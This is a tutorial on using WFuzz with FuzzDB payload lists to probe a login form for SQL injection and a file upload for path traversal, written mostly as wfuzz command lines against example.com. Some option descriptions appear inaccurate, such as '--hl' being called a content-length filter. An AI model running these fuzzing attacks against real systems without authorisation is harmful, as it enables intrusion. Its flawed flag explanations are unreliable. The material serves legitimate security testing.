Using wfuzz and fuzzdb (step-by-step)

Using WFuzz and FuzzDB together can significantly enhance your web application testing capabilities. Here are two in-depth, step-by-step examples demonstrating how to use these tools effectively to uncover vulnerabilities.

Testing for SQL Injection in a Login Form

Step 1: Setup and Preparation

Install WFuzz and Download FuzzDB: Ensure both tools are installed and properly configured. WFuzz can be installed using pip (e.g., pip install wfuzz), and FuzzDB can be cloned from its GitHub repository.

Identify the Target: Locate the login form you want to test for SQL injection vulnerabilities. For this example, assume the target URL is http://example.com/login.

Analyze the Form: Use browser developer tools to analyze the login form and identify the input fields. Let's assume the form has username and password fields and submits data via POST.

Step 2: Crafting the WFuzz Command

Construct the Base WFuzz Command: Start with a basic WFuzz command that sends a POST request to the login endpoint:

wfuzz -u http://example.com/login -d "username=FUZZ&password=test"

Incorporate FuzzDB Payloads: Use FuzzDB’s SQL injection payloads. These are typically found in fuzzdb/attack/sql-injection/payloads.txt. Modify the command to include this payload file:

wfuzz -u http://example.com/login -d "username=FUZZ&password=test" -w /path/to/fuzzdb/attack/sql-injection/payloads.txt

Handle HTTP Responses: Add parameters to filter interesting responses. For instance, filter based on content length:

wfuzz -u http://example.com/login -d "username=FUZZ&password=test" -w /path/to/fuzzdb/attack/sql-injection/payloads.txt --hl 200

Step 3: Running the Attack and Analyzing Results

Execute the Command: Run the crafted WFuzz command. WFuzz will iterate over each payload from FuzzDB and send it in the username parameter.

wfuzz -u http://example.com/login -d "username=FUZZ&password=test" -w /path/to/fuzzdb/attack/sql-injection/payloads.txt --hl 200

Analyze the Output: Look for anomalies in the responses. For example, a different content length might indicate a successful SQL injection attempt. Use WFuzz’s output options to format and review results:

wfuzz -u http://example.com/login -d "username=FUZZ&password=test" -w /path/to/fuzzdb/attack/sql-injection/payloads.txt --hl 200 -o csv

Tips for Better Performance

Route your traffic through a proxy like Burp Suite to capture and analyze each request and response in detail.

Customize FuzzDB payloads based on the specific database backend you suspect the application uses.

Avoid overwhelming the server by adjusting the rate of requests:

wfuzz -u http://example.com/login -d "username=FUZZ&password=test" -w /path/to/fuzzdb/attack/sql-injection/payloads.txt --hl 200 -t 5

Example: Fuzzing a File Upload Functionality for Path Traversal

Step 1: Setup and Preparation

Install WFuzz and Download FuzzDB: Ensure both tools are installed and configured as described in the first example.

Identify the Target: Locate the file upload functionality. Assume the target URL is http://example.com/upload.

Analyze the Form: Use browser developer tools to analyze the file upload form. Identify the input field for the file and other required parameters.

Step 2: Crafting the WFuzz Command

Construct the Base WFuzz Command: Start with a basic WFuzz command that sends a POST request to the upload endpoint. Assume the file parameter is file:

wfuzz -u http://example.com/upload -d "file=@FUZZ"

Use FuzzDB’s path traversal payloads. These can be found in fuzzdb/attack/path-traversal/Linux/paths.txt. Modify the command to include this payload file:

wfuzz -u http://example.com/upload -d "file=@FUZZ" -w /path/to/fuzzdb/attack/path-traversal/Linux/paths.txt

Handle HTTP Responses: Add parameters to filter interesting responses. For instance, filter based on specific response codes:

wfuzz -u http://example.com/upload -d "file=@FUZZ" -w /path/to/fuzzdb/attack/path-traversal/Linux/paths.txt --sc 200

Step 3: Running the Attack and Analyzing Results

Execute the Command: Run the crafted WFuzz command. WFuzz will iterate over each payload from FuzzDB and send it as the file name in the upload request.

wfuzz -u http://example.com/upload -d "file=@FUZZ" -w /path/to/fuzzdb/attack/path-traversal/Linux/paths.txt --sc 200

Analyze the Output: Look for successful uploads or specific responses indicating file access outside the intended directory. Use WFuzz’s output options to format and review results:

wfuzz -u http://example.com/upload -d "file=@FUZZ" -w /path/to/fuzzdb/attack/path-traversal/Linux/paths.txt --sc 200 -o html

Tips for Better Performance

Create intermediary files containing payloads to handle complex directory structures better.

Mix different types of payloads from FuzzDB to cover more attack vectors.

If possible, monitor server logs for detailed insights into how the application handles each payload.

These examples illustrate how to effectively combine WFuzz and FuzzDB. Understanding and customizing each step can uncover a wide range of vulnerabilities in web applications.